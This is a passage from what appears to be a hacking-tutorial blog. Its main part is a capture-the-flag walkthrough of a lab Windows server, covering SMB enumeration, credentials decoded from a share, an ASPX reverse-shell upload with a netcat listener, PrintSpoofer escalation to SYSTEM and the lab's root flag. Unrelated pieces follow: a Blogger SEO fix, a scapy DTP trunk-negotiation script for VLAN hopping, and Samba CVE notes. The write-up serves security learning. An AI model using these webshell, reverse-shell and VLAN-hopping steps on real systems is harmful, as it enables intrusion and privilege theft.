Pre-Engagement Briefing

You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in seven days.

Scope of Work

The client requests that an engineer conducts an assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test).  The client has asked that you secure two flags (no location provided) as proof of exploitation:

    User.txt
    Root.txt



Additionally, the client has provided the following scope allowances:


# Any tools or techniques are permitted in this engagement, however we ask that # you attempt manual exploitation first
# Locate and note all vulnerabilities found
# Submit the flags discovered to the dashboard
# Only the IP address assigned to your machine is in scope
# Find and report ALL vulnerabilities (yes, there is more than one path to root)

Penetration Testing Methodology

Reconnaissance

# Nmap



Enumeration

# Smbclient
# Smbmap



Exploiting

# Abuse of write permission in Samba service



Privilege Escalation

# Permission in SeImpersonatePrivilege in the system.

Lets Start, first of all we will Reconnaissance this machine (our target ip may be differ from you ),  lets scan first with nmap..

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo nmap -sC -sV  10.10.220.229                                                                                                                                                  130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 11:22 IST
Nmap scan report for 10.10.220.229
Host is up (0.35s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2022-03-17T05:53:59+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2022-03-16T05:13:22
|_Not valid after:  2022-09-15T05:13:22
| rdp-ntlm-info: 
|   Target_Name: RELEVANT
|   NetBIOS_Domain_Name: RELEVANT
|   NetBIOS_Computer_Name: RELEVANT
|   DNS_Domain_Name: Relevant
|   DNS_Computer_Name: Relevant
|   Product_Version: 10.0.14393
|_  System_Time: 2022-03-17T05:53:20+00:00
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb2-time: 
|   date: 2022-03-17T05:53:20
|_  start_date: 2022-03-17T05:14:03
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
|   Computer name: Relevant
|   NetBIOS computer name: RELEVANT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-03-16T22:53:20-07:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.72 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

Then we will enumerating with enum4linux but unfortunately we get nothing from it..but we will keep trying.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ enum4linux 10.10.220.229              
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 17 10:47:18 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.220.229
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.220.229    |
 ===================================================== 
[E] Can't find workgroup/domain


 ============================================= 
|    Nbtstat Information for 10.10.220.229    |
 ============================================= 
Looking up status of 10.10.220.229
No reply from 10.10.220.229

 ====================================== 
|    Session Check on 10.10.220.229    |
 ====================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$                                                                                                                                                                                     1 ⨯

you can also enumerate with nmap samba enumeration

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ nmap -p 139,445 -Pn --script smb-enum* 10.10.220.229
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-17 12:31 IST
Nmap scan report for 10.10.220.229
Host is up (0.35s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.220.229\ADMIN$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Remote Admin
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\C$: 
|     Type: STYPE_DISKTREE_HIDDEN
|     Comment: Default share
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.220.229\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: Remote IPC
|     Anonymous access: <none>
|     Current user access: READ/WRITE
|   \\10.10.220.229\nt4wrksv: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Anonymous access: <none>
|_    Current user access: READ/WRITE
| smb-enum-sessions: 
|_  <nobody>

Nmap done: 1 IP address (1 host up) scanned in 97.83 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

Also read-

We are visiting the web service (port 80), we check the source code and robots.txt, it seems that there is nothing useful.

Network share

Let’s start with the network share. Listing the shares reveals the presence of nt4wrksv.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$  smbclient -L //10.10.220.229
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    nt4wrksv        Disk      
SMB1 disabled -- no workgroup available

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

Connecting to this share reveals a password file:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo smbclient //10.10.220.229/nt4wrksv
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:16:04 2020
  ..                                  D        0  Sun Jul 26 03:16:04 2020
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020

                7735807 blocks of size 4096. 4922488 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> #www.hackingtruth.org

The file contains base64 encoded credentials, We decode the file and we found credentials.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ ls
content.txt  passwords.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ cat passwords.txt
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                                                    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

For decoding this one, you can use many types of method like online, offline, via terminal, etc. But we will hURL tool. So, first install it and then you can use it. 

Also read-

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo apt-get install hurl 

Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following packages were automatically installed and are no longer required:
  libblkid-dev libglib2.0-dev-bin libmount-dev libpcre16-3 libpcre2-dev libpcre2-posix3 libpcre3-dev libpcre32-3 libpcrecpp0v5 libselinux1-dev libsepol-dev mypaint-brushes mypaint-data
  mypaint-data-extras uuid-dev
Use 'sudo apt autoremove' to remove them.
The following NEW packages will be installed:
  hurl
0 upgraded, 1 newly installed, 0 to remove and 903 not upgraded.
Need to get 19.5 kB of archives.
After this operation, 191 kB of additional disk space will be used.
Get:1 http://ftp.harukasan.org/kali kali-rolling/main amd64 hurl all 2.1-0kali2 [19.5 kB]
Fetched 19.5 kB in 14s (1,432 B/s)
Selecting previously unselected package hurl.
(Reading database ... 431755 files and directories currently installed.)
Preparing to unpack .../hurl_2.1-0kali2_all.deb ...
Unpacking hurl (2.1-0kali2) ...
Setting up hurl (2.1-0kali2) ...
Processing triggers for kali-menu (2021.4.2) ...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ hURL -b "Qm9iIC0gIVBAJCRXMHJEITEyMw=="

Original string       :: Qm9iIC0gIVBAJCRXMHJEITEyMw==                                                                                                                                       
base64 DEcoded string :: Bob - !P@$$W0rD!123
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ hURL -b "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk"

Original string       :: QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk                                                                                                                           
base64 DEcoded string :: Bill - Juw4nnaM4n420696969!$$$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 



┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d            
Bob - !P@$$W0rD!123                                                                                                                                                                         ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ #www.kumaratuljaiswal.in    #www.hackingtruth.in
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bill - Juw4nnaM4n420696969!$$$                                                                                                                                                              ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$                          
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d;echo""
Bill - Juw4nnaM4n420696969!$$$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d;echo""            
Bob - !P@$$W0rD!123
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

Is an hour of use of smbmap with credentials found. We view can writing in share “nt4wrksv“.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ smbmap -H 10.10.220.229 -u bob -p '!P@$$W0rD!123'
[+] IP: 10.10.220.229:445       Name: 10.10.220.229                                     
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        nt4wrksv                                                READ, WRITE
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ 

Also read-

 Click Here

We are testing access the directory in different webservice, we enumerate of the correct SAMBA webservice in running port 49663.

Exploiting

We upload a “shell.aspx“, this is a webshell for execute commands from browser.

Click Here for Shell...


But first download shell.aspx

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo wget https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
[sudo] password for hackerboy: 
--2022-03-18 12:33:57--  https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8003::154, 2606:50c0:8000::154, 2606:50c0:8001::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15968 (16K) [text/plain]
Saving to: ‘shell.aspx’

shell.aspx                                     100%[====================================================================================================>]  15.59K  --.-KB/s    in 0.002s  

2022-03-18 12:34:04 (9.54 MB/s) - ‘shell.aspx.1’ saved [15968/15968]

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$

After downloading this shell.aspx, change this IP and port number with your (Attacker) machine IP address.

Now we can upload this shell in samba network via this command:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:16:04 2020
  ..                                  D        0  Sun Jul 26 03:16:04 2020
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020

                7735807 blocks of size 4096. 4951344 blocks available
smb: \> put shell.aspx
putting file shell.aspx as \shell.aspx (1.1 kb/s) (average 1.1 kb/s)
smb: \> 

then we will run this url on browser and get a reverse shell via this command: 

10.10.162.140:49663/nt4wrksv/shell.aspx (this IP is belong to vulnerable machine)

then run this command in our terminal

nc -nvlp 4444

after connecting reverse shell with your system then we will find user flag, so i searched it in every directory/file and finally i found this...so, i recommend you first find it yourself.

User-flag

Privilege Escalation (NT AUTHORITY\SYSTEM) (Root Flag)

We execute of command “whoami /priv” and we see that we have permission in privilege “SeImpersonatePrivilege” of the system.

c:\Users\Bob\Desktop>whoami /priv           
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

c:\Users\Bob\Desktop> 

I started to Google the abuse of this privilege in Windows 2016, I found this github that worked for me (after several xD attempts).

PrintSpoofer

To exploit this impersonation privilege, the standard potato exploit won’t work, and we’ll use a new tool called PrintSpoofer.

First we will download a PrintSpoofer.exe file for get a administrator power in windows...

Click Here

Then we will put PrintSpoofer in samba network..

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/tryhackme-relevant]
└─$ sudo smbclient //10.10.177.40/nt4wrksv -u bob -p
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 26 03:16:04 2020
  ..                                  D        0  Sun Jul 26 03:16:04 2020
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020

                7735807 blocks of size 4096. 4951344 blocks available
smb: \>
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (8.7 kb/s) (average 7.1 kb/s)
smb: \> 
smb: \> dir
  .                                   D        0  Fri Mar 18 12:52:00 2022
  ..                                  D        0  Fri Mar 18 12:52:00 2022
  passwords.txt                       A       98  Sat Jul 25 20:45:33 2020
  PrintSpoofer.exe                    A    27136  Fri Mar 18 12:52:02 2022
  shell.aspx                          A    15990  Fri Mar 18 12:38:30 2022

                7735807 blocks of size 4096. 4946925 blocks available
smb: \> 

c:\inetpub\wwwroot\nt4wrksv>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of c:\inetpub\wwwroot\nt4wrksv

03/18/2022  12:22 AM    <DIR>          .
03/18/2022  12:22 AM    <DIR>          ..
07/25/2020  08:15 AM                98 passwords.txt
03/18/2022  12:22 AM            27,136 PrintSpoofer.exe
03/18/2022  12:08 AM            15,990 shell.aspx
               3 File(s)         43,224 bytes
               2 Dir(s)  20,228,485,120 bytes free

c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer -i -c cmd
PrintSpoofer -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>               

Now, let’s elevate our privileges with printspoofer:

Root Flag

C:\Windows\system32>cd /
cd /

C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\

07/25/2020  08:16 AM    <DIR>           inetpub
07/25/2020  08:42 AM    <DIR>           Microsoft
07/16/2016  06:23 AM    <DIR>           PerfLogs
07/25/2020  08:00 AM    <DIR>           Program Files
07/25/2020  04:15 PM    <DIR>           Program Files (x86)
07/25/2020  02:03 PM    <DIR>           Users
07/25/2020  04:16 PM    <DIR>           Windows
               0 File(s)              0 bytes
               7 Dir(s)  20,228,354,048 bytes free

C:\>cd Users
cd Users

C:\Users>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users

07/25/2020  02:03 PM    <DIR>           .
07/25/2020  02:03 PM    <DIR>           ..
07/25/2020  08:05 AM    <DIR>           .NET v4.5
07/25/2020  08:05 AM    <DIR>           .NET v4.5 Classic
07/25/2020  10:30 AM    <DIR>           Administrator
07/25/2020  02:03 PM    <DIR>           Bob
07/25/2020  07:58 AM    <DIR>           Public
               0 File(s)              0 bytes
               7 Dir(s)  20,228,354,048 bytes free

C:\Users>cd Administrator
cd Administrator

C:\Users\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator

07/25/2020  10:30 AM    <DIR>           .
07/25/2020  10:30 AM    <DIR>           ..
07/25/2020  07:58 AM    <DIR>           Contacts
07/25/2020  08:24 AM    <DIR>           Desktop
07/25/2020  07:58 AM    <DIR>           Documents
07/25/2020  08:39 AM    <DIR>           Downloads
07/25/2020  07:58 AM    <DIR>           Favorites
07/25/2020  07:58 AM    <DIR>           Links
07/25/2020  07:58 AM    <DIR>           Music
07/25/2020  07:58 AM    <DIR>           Pictures
07/25/2020  07:58 AM    <DIR>           Saved Games
07/25/2020  07:58 AM    <DIR>           Searches
07/25/2020  07:58 AM    <DIR>           Videos
               0 File(s)              0 bytes
              13 Dir(s)  20,226,048,000 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is AC3C-5CB5

 Directory of C:\Users\Administrator\Desktop

07/25/2020  08:24 AM    <DIR>           .
07/25/2020  08:24 AM    <DIR>           ..
07/25/2020  08:25 AM                35 root.txt
               1 File(s)             35 bytes
               2 Dir(s)  20,224,438,272 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}
C:\Users\Administrator\Desktop>

C:\Users\Administrator\Desktop>hackingtruth.org 

Congratulations we got it :-)

Disclaimer

 

Fix Breadcrumbs Error fix on blogger

Guys, if you are new to blogger or you have used free blogger template then you must have come across Breadcrumbs Error in Google Search Console, this problem of Breadcrumbs Error was not seen before 2018 but since google has changed its algorithm Ever since the users of the free blogger template have to face the issue of Breadcrumbs Error.

You can fix Breadcrumbs Error in blogger very easily, for this you have to go to your theme and make small changes, some people even give html code in it, but that method is not right, it is much easier to fix it, nor do you have to paste any html code, just make a small change and your Breadcrumbs Error. The problem will be fixed.

What is Breadcrumbs Error? ( what is breadcrumbs error in hindi )

When we create a new blog on blogger, we do not have enough money to buy premium blogger template, due to which we use the free blogger template on the internet on our blog, due to which there is a Breadcrumbs name in our Google Search Console. The error comes which is called Breadcrumbs Error or Breadcrumbs Issue.


If you use Paid blogger template or Premium blogger template, then this problem is already fixed in these templates, if you have used free template then you have to fix it yourself, then let's know how to fix Blogger Breadcrumbs error Do or how to fix Blogger Breadcrumbs issue.

Additional Details - SPF Record on TopLevel Domain

How to fix breadcrumbs error?

Guys, before fixing the Breadcrumbs Error, let me tell you that this problem is very small, it is very easy to fix it, but once the breadcrumbs issue comes, then your post indexing stops completely, due to which your post is not indexed. And the traffic also decreases, so let's know what is the breadcrumbs issue? And how to fix it step by step.



First of all as you can see we got a mail by google search console..

Step 1- If you have not logged on to blogger, then first go to blogger and login.

Step 2- Now you have to go to the post section and search your article post in which your broadcrumbs error occurred.

Step 3- Then see on the right side on label section where you dont have any label (lable like categories).

Step 4- Add some label like this otherwise update it.

Step 5- Now you have to go google search console page and on the left side and click on breadcrumbs option.

Step 6- Copy the URL of breadcrumbs affected page and paste it here on search console

Step 7- so there are one message appear URL is on google (index) but has some issues

Step 8- Then click on Test Live URl.

Step 9- Hurrah finally click on Save and after waiting few seconds the theme will be updated.

Step 10- After this you have to come to Google Search Console and go to Breadcrumbs and click on START NEW VALIDATION, after that wait for a week your problem of breadcrumbs error will be solved.

If you face any problem in correcting the breadcrumbs issue even after this article, then you can ask me by commenting.

Disclaimer

 

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

DTP Abusing

DTP stands for dynamic trunking protocol. This protocol is basically cisco proprietary protocol which is layer 2 protcol that means it once only one cisco devices and it operates are layer 2 OSI Model and this protocol is used to form trunking automatically between two switches and the DTP feature is bydefault enabled on cisco switches.


So, lets understand about the Mode in DTP -

actually by default whenever you buy a new switch ports will be dynamically auto or it will be dynamically desirable so lets understand one by one, the dynamic auto.


Dynamic Auto :- In this mode the switchport  will wait for the neighbor to initiate, order to form trunk. Like the dynamic the ports switch which are in dynamic auto mode they will never initiate to form the trunk, They can form trunk but when the never will initiate. They themselves don't initiate to form the trunk.



Dynamic Desirable :- In this mode the switchport actively participate to form trunk thats mean if this switch port are current dynamic desirable mode then they will themselves initiate and they will form the trunk. So, along with the trunk in encapsulation will also be negotiated between two swiches so let me show you with the helo of figure that we mentioned below.



So, here is the port the dynamic switch auto and other one is dynamic auto also so they will exchange the DTP messages but no body will be initiate because both are in dynamic automode , the ports which are in dynamic auto mode they cannot initiate to form the trunk and in this case 

The DD will also be send DTP, the DD will also send, so in this case the ports will initiate to form the trunk and when the neighbor will initiate to form the trunk, the DD will also accepted and they will form the trunks, so in this case the trunk will be dynamically from between the two switches.

Here they will exchange the DTP messages and they both will initiate
 

Additional Detail- Let's read
For short refreshing:

Ethernet is on Layer 2, IP (Internet Protocol) on Layer 3, TCP (Transport Control Protocol) or UDP on Layer 4–6 and services like HTTP, SMTP,
FTP on Layer 7.

Also read -

Code Your Own ARP Spoofing Over VLAN Hopping - CLICK HERE
Code your own MAC Flooding Tool - CLICK HERE
Defend ARP poisoning attacks - CLICK HERE
Code your own ARP Cache Poisoning - CLICK HERE

Thanks to the DTP protocol and its property to completely overlook any kind of security we now can send a single Dynamic-Desirable packet to every DTP enabled Cisco device and ask it to change our port into a trunk port.

Code Your Own DTP Packet

#!/usr/bin/python3

import sys
from scapy.layers.l2 import Dot3 , LLC, SNAP
from scapy.contrib.dtp import *

if len(sys.argv) < 2:
    print(sys.argv[0] + " <dev>")
    sys.exit()

negotiate_trunk(iface=sys.argv[1])

As an optional parameter you can set the MAC address of the spoofed neighbor switch if none is set a random one will be automatically generated.

The attack can last some minutes, but an attacker doesn’t care about the delay, because they know what they get in exchange the possibility to connect to every VLAN!

• sudo vconfig add eth0 <vlan-id>
• sudo ifconfig eth0.<vlan-id> <ip_of_vlan> up

example -

• vconfig add wlan0 1
• ifconfig wlan0.1 192.168.13.15 up

NOTE- <ip_of_vlan> thats mean as per your need or you can any IP with your mind.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
└─$ sudo vconfig add wlan0 1                                                                                                                                                            2 ⚙
[sudo] password for hackerboy: 

Warning: vconfig is deprecated and might be removed in the future, please migrate to ip(route2) as soon as possible!

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
└─$ sudo ifconfig wlan0.1 192.168.13.15 up                                                                                                                                              2 ⚙
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
└─$                                                                                                                                                                                     2 ⚙
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
└─$ ifconfig                                                                                                                                                                            2 ⚙

wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.21.25  netmask 255.255.255.0  broadcast 192.168.21.255
        inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
        inet6 2409:4064:195:1000:288e:7e35:5b22:f417  prefixlen 64  scopeid 0x0<global>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 89316  bytes 69611668 (66.3 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 74658  bytes 42465996 (40.4 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0.1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.13.15  netmask 255.255.255.0  broadcast 192.168.13.255
        inet6 fe80::fe01:7cff:fe29:77  prefixlen 64  scopeid 0x20<link>
        ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6  bytes 516 (516.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vlan]
└─$                                    

Now we can run program with wlan0.1 interface (see the code above).

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ sudo python3 dtp-trunk.py wlan0.1            
[sudo] password for hackerboy: 
Trying to negotiate a trunk on interface wlan0.1
.
Sent 1 packets.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/python/mymodule]
└─$ 

Disclaimer

Critical samba bug lurking in your system CVE-2021-44141 and CVE-2022-0336

Understanding SMB

SMB - Server Message Block Protocol - is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [source] Learn about, then enumerate and exploit a variety of network services and misconfigurations.
 
Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers. The SMB protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

How does SMB work?

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

Also read- All about SMB and enum4linux with Questions/Answer

Also read- Samba and exploitation too

Samba Active Directory

The Samba AD DC includes checks when adding service principals names (SPNs) to an account to ensure that SPNs do not alias with those already in the database. Some of these checks are able to be bypassed if an account modification re-adds an SPN that was previously present
on that account, such as one added when a computer is joined to a domain. An attacker who has the ability to write to an account can exploit
this to perform a denial-of-service attack by adding an SPN that matches an existing service. Additionally, an attacker who can
intercept traffic can impersonate existing services, resulting in a loss of confidentiality and integrity.




According to the CERT Coordination Center (CERT/CC), the flaw also affects widely used Linux distributions such as Red Hat, SUSE Linux, and Ubuntu.

The vulnerability, rated 9.9 on the CVSS scale, has been credited to security researcher Orange Tsai from DEVCORE, who last year disclosed the widely-exploited flaws in Microsoft Exchange Server. Additionally, the fix has been issued in Samba versions 4.14.12 and 4.15.5.



Samba administrators are advised to upgrade to the latest releases (4.13.17, 4.14.12, and 4.15.5) or apply a patch as soon as possible. Mitigation short of patching would involve changing Samba configuration files so that the vulnerable vfs_fruit module doesn’t run. “The specific flaw exists within the parsing of EA metadata when opening files in SMBD,” an advisory on the flaw from developers of Samba explains.

The ability to write access to extended file attributes is needed in order to attack the flaw, but such permissions are granted to guest or unauthenticated users.

Also addressed by Samba are two additional flaws —

• CVE-2021-44141 (CVSS score: 4.2) - Information leak via symlinks of existence of files or directories outside of the exported share (Fixed in Samba version 4.15.5)
  

• CVE-2022-0336 (CVSS score: 3.1) - Samba AD users with permission to write to an account can impersonate arbitrary services (Fixed in Samba versions 4.13.17, 4.14.12, and 4.15.4)

Samba administrators are recommended to upgrade to these releases or apply the patch as soon as possible to mitigate the defect and thwart any potential attacks exploiting the vulnerability

Disclaimer

My dear Linux lovers, how are you all remember us, you were reading about cache poisoning, if you don't remember then it doesn't matter. But do not take tension, after this this blog will not let you forget, yet you bookmark our website, it is your benefit, so now come back to your on our topic.

